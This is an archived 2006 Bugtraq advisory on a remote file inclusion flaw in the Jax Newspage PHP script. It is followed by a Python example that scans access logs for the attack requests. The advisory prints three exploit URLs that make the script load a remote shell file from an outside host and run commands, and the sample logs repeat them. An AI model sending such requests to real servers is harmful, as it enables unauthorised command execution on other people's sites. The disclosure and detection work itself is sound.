Bugtraq mailing list archives
Jax Newspage Remote File include
From: dj_remix_20 () hotmail com
Date: 13 Oct 2006 01:00:51 -0000
# BiyoSecurity.Org & SecurityWall.Org
# Download : http://www.jtr.de/scripting/php/newspage/newspage%20v1.15.zip
# Script Name : jax newspage
# Version : 1.15
# Risk : high
# Regard : RMx
# Thanx : Liz0zim , KorsaN , DreamLord , TR_IP

# Vulnerable Files :
/admin/index.php
/admin/news.admin.php
/newsarchive.php

# Vulnerable code :
// Global variables
require ( $path_to_script."globals.inc.php");

# Exploit :
http://www.victim.com/[PATH]/newsarchive.php?path_to_script=http://site.com/cmd.gif?&cmd=ls
http://www.victim.com/[PATH]/admin/index.php?path_to_script=http://site.com/cmd.gif?&cmd=ls
http://www.victim.com/[PATH]/admin/news.admin.php?path_to_script=http://site.com/cmd.gif?&cmd=ls
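The request pattern reported above can be searched for in web server access logs. The following is an added example, not part of the original post or of the Jax Newspage code: it flags requests to the three listed scripts that supply `path_to_script`, and marks those whose value starts with a URL scheme. The log lines, addresses, the `site.example` host and the `page` parameter are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Scripts the advisory lists as including $path_to_script unchecked.
VULNERABLE_SCRIPTS = ("/admin/index.php", "/admin/news.admin.php", "/newsarchive.php")
PARAM = "path_to_script"  # PHP variable names are case-sensitive
# A leading URL scheme means the include prefix points off-host.
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)
# Client address, request target and status from a Common/Combined Log Format line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log lines (documentation addresses, reserved domain).
SAMPLE_LOG = """\
192.0.2.10 - - [13/Oct/2006:01:10:02 +0000] "GET /news/newsarchive.php?page=2 HTTP/1.1" 200 5120
192.0.2.44 - - [13/Oct/2006:01:12:40 +0000] "GET /news/newsarchive.php?path_to_script=http://site.example/cmd.gif?&cmd=ls HTTP/1.1" 200 812
192.0.2.44 - - [13/Oct/2006:01:12:55 +0000] "GET /news/admin/index.php?path_to_script=HTTP%3A%2F%2Fsite.example%2Fcmd.gif%3F HTTP/1.1" 200 799
192.0.2.51 - - [13/Oct/2006:01:20:11 +0000] "GET /news/admin/news.admin.php?path_to_script=../ HTTP/1.1" 500 0
192.0.2.60 - - [13/Oct/2006:01:25:00 +0000] "GET /other/page.php?path_to_script=http://site.example/x HTTP/1.1" 404 0
"""

def classify(target):
    """Return None, 'override' or 'remote-include' for one request target."""
    parts = urlsplit(target)
    if not unquote(parts.path).endswith(VULNERABLE_SCRIPTS):
        return None
    verdict = None
    # parse_qsl percent-decodes names and values once, as PHP does.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name != PARAM:
            continue
        if REMOTE.match(value):
            return "remote-include"
        verdict = "override"  # a client should never supply this variable
    return verdict

def scan(log_text):
    """Return (client, status, verdict, target) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if m and (verdict := classify(m.group(2))):
            hits.append((m.group(1), int(m.group(3)), verdict, m.group(2)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

A flagged line with status 200 only shows that the script answered the request; whether a remote include could actually run depends on the server's PHP configuration, for example `allow_url_fopen`.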